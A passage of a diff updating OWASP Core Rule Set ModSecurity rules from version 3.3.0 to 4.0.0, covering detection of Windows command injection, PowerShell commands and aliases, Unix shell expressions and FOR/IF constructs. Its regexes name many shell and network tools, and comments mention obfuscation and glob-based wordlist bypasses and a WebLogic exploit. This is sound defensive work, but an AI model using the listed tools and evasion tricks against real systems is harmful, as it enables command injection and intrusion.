"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ - "id:932110,\ - phase:2,\ - block,\ - capture,\ - t:none,\ - msg:'Remote Command Execution: Windows Command Injection',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-shell',\ - tag:'platform-windows',\ - tag:'attack-rce',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/248/88',\ - tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Apache 2.2 requires configuration file lines to be under 8kB. -# Therefore, some remaining commands have been split off to a separate rule. -# For explanation of this rule, see rule 932110. -# -# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: -# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# [ Windows PowerShell, cmdlets and options ] # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# Detect some common PowerShell commands, cmdlets and options. +# These commands should be relatively uncommon in normal text, but +# potentially useful for code injection. # -# Then insert the assembled regexp into this template: +# If you are not running Windows, it is safe to disable this rule. # -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* -# [regexp assembled from util/regexp-assemble/regexp-932110.txt] -# (?:\.[\"\^]*\w+)?\b" \ +# https://learn.microsoft.com/en-us/previous-versions/technet-magazine/ff714569(v=msdn.10) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ - "id:932115,\ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ + "id:932120,\ phase:2,\ block,\ capture,\ - t:none,\ - msg:'Remote Command Execution: Windows Command Injection',\ + t:none,t:cmdLine,\ + msg:'Remote Command Execution: Windows PowerShell Command Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ + tag:'language-powershell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# [ Windows PowerShell, cmdlets and options ] -# -# Detect some common PowerShell commands, cmdlets and options. -# These commands should be relatively uncommon in normal text, but -# potentially useful for code injection. +# [ Windows Powershell cmdlet aliases ] # +# Attempts to detect aliases of the common PowerShell cmdlets in windows-powershell-commands.data # If you are not running Windows, it is safe to disable this rule. # -# https://technet.microsoft.com/en-us/magazine/ff714569.aspx -# https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help +# There are other aliases which are similar to Unix, but they are properly handled by rule 932105 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ - "id:932120,\ +# Regular expression generated from regex-assembly/932125.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932125 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:a[\"\^]*n|[dipv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\v,\.-/;-<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\v,\.-/;-<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\v,\.-/;-<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\v,\.-/;-<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[u-v])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\v,\.-/;-<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\v,\.-/;-<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\v,\.-/;-<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\v,\.-/;-<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\v,\.-/;-<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[civ]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\v,\.-/;-<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932125,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\ - msg:'Remote Command Execution: Windows PowerShell Command Found',\ + t:none,\ + msg:'Remote Command Execution: Windows Powershell Alias Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ - tag:'language-powershell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell expressions ] @@ -339,16 +277,23 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # <(foo) Process substitution # >(foo) Process substitution # $((foo)) Arithmetic expansion +# /e[t]c Shell glob expression to bypass wordlists # -# Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# This rule has a stricter sibling: 932131 (PL2) that applies the same regex to User-Agent and Referer # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \ +# This rule is essential to defend against the Log4J / Log4Shell attacks (see also rule 944150) +# +# Regular expression generated from regex-assembly/932130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932130 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \ "id:932130,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:cmdLine,\ + t:none,t:cmdLine,\ msg:'Remote Command Execution: Unix Shell Expression Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -359,11 +304,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows FOR, IF commands ] @@ -386,15 +330,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # http://ss64.com/nt/if.html # http://ss64.com/nt/for.html # -# Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble. -# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# Regular expression generated from regex-assembly/932140.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932140 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:for(?:/[dflr].*)? %+[^ ]+ in\(.*\)[\s\v]?do|if(?:/i)?(?: not)?(?: (?:e(?:xist|rrorlevel)|defined|cmdextversion)\b|[ \(].*(?:\b(?:g(?:eq|tr)|equ|neq|l(?:eq|ss))\b|==)))" \ "id:932140,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:cmdLine,\ + t:none,t:cmdLine,\ msg:'Remote Command Execution: Windows FOR/IF Command Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 